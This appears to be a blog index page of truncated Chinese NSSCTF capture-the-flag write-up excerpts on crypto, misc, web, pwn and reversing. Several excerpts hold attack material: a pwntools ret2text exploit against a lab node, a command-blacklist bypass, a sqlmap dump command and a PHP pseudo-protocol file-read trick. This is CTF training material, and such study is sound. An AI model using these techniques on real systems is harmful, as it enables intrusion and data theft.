• 2024-06-22nssctf (2)
    misc*1.转为十六进制编码先是放入winhex,没有发现什么。然后属性也没有。就放入binwalk分离得到一个文档 S1ADBBQAAQAAADkwl0xs4x98WgAAAE4AAAAEAAAAY29kZePegfAPrkdnhMG2gb86/AHHpS0GMqCrR9s21bP43SqmesL+oQGo50ljz4zIctqxIsTHV25+1mTE7vFc9gl5IUif7f1/rHIpHql7nqKPb+2M
  • 2024-06-19NSSCTF ID:389
    我开始入门pwn了,可能有些地方讲的不是很清楚,如果有讲错的地方,各位大佬一定要指点指点我。下载完后打开附件发现是python代码,blacklist是黑名单,所以这里我们要想办法绕过这个黑名单这里我通过l\s绕过了ls的检测,后面也打算这样绕过但这里好像还是被检查到了,自己看了一
  • 2024-06-13nssctf
    crypto1.UUencode不知道是什么解码,用随波逐流看看 还是不知道仔细看看,突然想起他是哪个编码了,UUencode 2栅栏  猜了很多 最后猜了网站的名字,嘿嘿出来了 3.社会主义 很简单的社会主义核心价值解码 4.bubble密码 是ook吧uunbase64  这就没见
  • 2024-06-09NSSCTF-Web题目6
    目录[NISACTF2022]checkin1、题目2、知识点3、思路[NISACTF2022]babyupload1、题目2、知识点3、思路[SWPUCTF2022新生赛]1z_unserialize1、题目2、知识点3、思路[NISACTF2022]checkin1、题目2、知识点010编辑器的使用、url编码3、思路打开题目,得到源
  • 2024-06-08NSSCTF———MISC
    [NISACTF2022]huaji?[SWPU2020]套娃[LitCTF2023]What_1s_BASE(初级)[SWPUCTF2021新生赛]gif好像有点大[NISACTF2022]为什么我什么都看不见[LitCTF2023]404notfound(初级)[LitCTF2023]这羽毛球怎么只有一半啊(恼(初级)[LitCTF2023]喜欢我的压缩包么(初级)[HDCTF
  • 2024-06-07NSSCTF——crypto
    [鹤城杯2021]easy_crypto[强网拟态2021]拟态签到题[SWPUCTF2021新生赛]crypto8[SWPUCTF2021新生赛]crypto7[SWPUCTF2021新生赛]crypto6[SWPUCTF2021新生赛]ez_caesar[SWPUCTF2021新生赛]cr
  • 2024-05-15NSSCTF round#22逆向
    NSSCTFround#22逆向1.wp要及时写不然忘光光2.赛题分文件夹放ezcrypt下载下来是python打包的exe,解包出pyc用pycdc反编译看一下嗯不认识BEFORE_WITH命令。丢到gpt4o里看看还蛮准确的,和作者提供的源码一样。不过对填充的处理不对,原程序是填充'\x00'。不过比自己硬看好太多
  • 2024-05-02NSSCTF流量分析
    1.[BSidesSF-CTF2019]Zippync-l-p4445>flag.zipunzip-Psupercomplexpasswordflag.zipArchive:flag.zipinflating:flag.txtPK.... ...NdbN..,.%...........flag.txtUT ....z\..z\ux...............(.y..z....F.......:...#Bz..:
  • 2024-04-122024 NSSCTF 做题记录
    web[SWPUCTF2021新生赛]easy_sql我可能不知道怎么写参数,但是我会用sqlmap.python3sqlmap.py-u....--dumptestdb另外说一句,直接用--dump-all是很蠢的行为因为可能会dump到mysql的配置数据库,显然对拿到flag没什么帮助。trytouse--dbs.[SWPUCTF2021新生
  • 2024-03-28关于RCE的学习(2)nssctf部分题目实操(1)
           结果对一些基础命令的学习,我发现一个非常显而易见的问题,那就是,理论知识如果没有建立在实操的基础上来讲的话,那么理论知识就会显得非常空,那么结合我上一篇对rce学习的文章,我对一下题目做出如下总结。       首先是,[SWPUCTF2021新生赛]easyrce   
  • 2024-03-21NSSCTF—Crypyo "第一页" ԅ(≖‿≖ԅ) (待续……)
    [鹤城杯2021]easy_crypto题目:公正公正公正诚信文明公正民主公正法治法治诚信民主自由敬业公正友善公正平等平等法治民主平等平等和谐敬业自由诚信平等和谐平等公正法治法治平等平等爱国和谐公正平等敬业公正敬业自由敬业平等自由法治和谐平等文明自由诚信自由平等富强公正敬业
  • 2024-03-16NSSCTF_pwn_notepage(1)
    NSSCTF_pwn_刷题笔记page(1)[SWPUCTF2021新生赛]gift_pwnfrompwnimport*io=remote('node4.anna.nssctf.cn',28991)padding=16+8shell=0x4005B6payload=b'A'*padding+p64(shell)io.sendline(payload)io.interactive()[SWPUCTF2021新生赛]
  • 2024-01-13NSSCTF Round#16 Basic WriteUp
    NSSCTFRound#16Basicwp目录NSSCTFRound#16Basicwp一.pwn1.nc_pwnre2.ret_text一.pwn1.nc_pwnrenc连接得到题目,给了一段汇编代码以及40个十六进制数字分析代码可知,将一个字符串与10h即16进行异或运算,二次异或运算得到字符串TlNTQ1RGe1dFTGMwTV9UMF9wV25fdzByMWQhfQ
  • 2023-12-29CTF-日志分析
    前言平台:https://www.nssctf.cn/[陇剑杯2021]日志分析(问1)点击查看题目描述题目描述:单位某应用程序被攻击,请分析日志,进行作答:网络存在源码泄漏,源码文件名是_____________。(请提交带有文件后缀的文件名,例如x.txt)。得到的flag请使用NSSCTF{}格式提交。搜索常见的文件名
  • 2023-10-17【NSSCTF逆向】【2023题目】《润!》
    题目解法这道题蛮搞的,不算简单。刚开始拿到这道题运行一下有些信息,是一道迷宫题,可能flag是我们输入的路线吧?先拿exeinfo来看看告诉我有壳,但是不要用upx-d来脱壳,结合题目的标签,知道这题有一个魔改upx壳。硬脱不行。说实话我对upx的了解很皮毛,网上搜了搜upx壳的详细源
  • 2023-09-27[NSSCTF 2nd]MyBase
    思路:IDA打开,发现有符号表,还贴心的备注了Base64加密。仔细一看也确实是这样。拿base64表直接丢到赛博厨子,太棒了,没有结果。怀疑是不是趁我睡着了改了我的Base64表,直接下断点动调,不调不要紧,一调吓一跳,Base64表在每次循环的时候都会变,但是加密用的表一定是相同的,那就记录每一次的表,
  • 2023-09-03NSSCTF 2nd Crypto复现
    1,EzRSA题目代码:fromCrypto.Util.numberimport*fromsecretimportflagm=bytes_to_long(flag)assertm.bit_length()<200p=getPrime(512)q=getPrime(512)n=p*qe=3c=pow(m,e,n)kbits=103m=(m>>kbits)<<kbitsMod=getPrime
  • 2023-08-18【NSSCTF逆向】【2023题目】《VidarCamera》
    题目VidarCamera解法这是一道安卓逆向题目,放在模拟器里打开看看需要输入一个序列号啥的,扔jadx里吧。通过字符串搜索定位到关键代码这里应该就是一个变种TEA,更改了加密轮次,delta。不过是TEA加密,写脚本不太难,自己的太丑了,贴个别人的点击查看代码fromCrypto.Util.numbe
  • 2023-08-17【NSSCTF逆向】【2023题目】《kunmusic》
    题目kunmusic解法这题还是非常有意思的。打开有很多button,可能是需要按button的次数来得到flag把。这是一个.net的程序,需要用dnspy来反编译他反编译这个dll找到这个入口点可以看到是引入了某片数据,然后进行异或104,进行一个解密。找到这个东西、把他保存下来,然后
  • 2023-07-23【NSSCTF逆向】【2023题目】《Bytecode》
    题目Bytecode解法是蛮久没见的字节码题目,还有点记忆这里一大长串应该是一串数组,跟存储后变形的flag有关上面的啥打印错误什么的应该是在跑的时候告诉我们有问题,也不用管红框里面可以看到是一个循环从46到152可以继续看到红框里面的东西,应该就是主要的变形过程了。写w
  • 2023-07-23[SWPUCTF 2021 新生赛]PseudoProtocols
    [SWPUCTF2021新生赛]PseudoProtocols题目来源:nssctf题目类型:web涉及考点:PHP伪协议1.先看题目,给了一个提示要我们找hint.php,我们直接修改url:http://node2.anna.nssctf.cn:28069/hint.php发现页面空白无回显,这时候想到了使用PHP伪协议让其base64编码输出:http://node2.ann
  • 2023-07-13nssctf-1
    刷过的题,gpt的出现是世界上最伟大的发明[SWPUCTF2021新生赛]gift_F12F12,查看源码,直接搜flagtag:审查前端元素[SWPUCTF2021新生赛]jicao<?phphighlight_file('index.php');include("flag.php");$id=$_POST['id'];$json=json_decode($_GET['json'],tru
  • 2023-07-13nssctf-2
    tryagain,学到了[SWPUCTF2021新生赛]ez_unserialize点进去,查看源码,提示disallow,是一个爬虫协议robots.txt,访问得到源码<?phperror_reporting(0);show_source("cl45s.php");classwllm{public$admin;public$passwd;publicfunction__construct()
  • 2023-06-04NSSCTF_Round13 web
    flask?jwt?1.信息收集题目提示这里告诉了这题涉及的内容2.开始探索(1)发现有注册,有忘记密码然后这里尝试admin登录,但失败所以直接注册一个用户 (2)注册后登录给出页面,点了拿flag,访问/getFlag路由但是告诉不是admin  然后根据题目信息里的提示应该就需要伪造admin
  • 2023-05-09[NISACTF 2022]string
    查壳:64位:进IDA:进来就给flag:跟进:一堆东西,秉承着赶时间的优良作风,只看有用的输出:挺简单一个随机数问题,找种子就行:上脚本:intmain(){srand(10086);for(inti=1;i<=13;i++){intv4=rand();cout<<v4%8+1;}return0;